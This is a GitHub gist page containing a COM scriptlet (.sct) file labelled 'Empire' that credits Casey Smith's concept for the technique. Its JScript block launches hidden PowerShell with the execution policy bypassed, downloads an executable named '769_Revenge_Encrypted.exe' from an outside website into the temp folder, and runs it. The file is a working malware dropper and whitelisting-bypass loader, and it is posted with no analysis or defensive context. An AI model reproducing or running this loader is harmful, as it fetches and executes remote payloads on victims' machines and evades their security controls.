Skip to content

Instantly share code, notes, and snippets.

@Elm0D
Created September 2, 2017 00:37
Show Gist options
  • Select an option

  • Save Elm0D/7b0ca57d5a9100bd08e2c704b734081a to your computer and use it in GitHub Desktop.

Select an option

Save Elm0D/7b0ca57d5a9100bd08e2c704b734081a to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
<!-- Credits Of Concept - Casey Smith -->
<script language="JScript">
<![CDATA[
var Wsh = new ActiveXObject("WScript.Shell");
var ps = "powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command $down = New-Object System.Net.WebClient;$url = 'https://dataseals.org/UploadCenter/up/769_Revenge_Encrypted.exe';$file = $env:temp + '\\7697894.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application;$exec.shellexecute($file);exit;";
Wsh.Run(ps, 0, false);
]]>
</script>
</registration>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment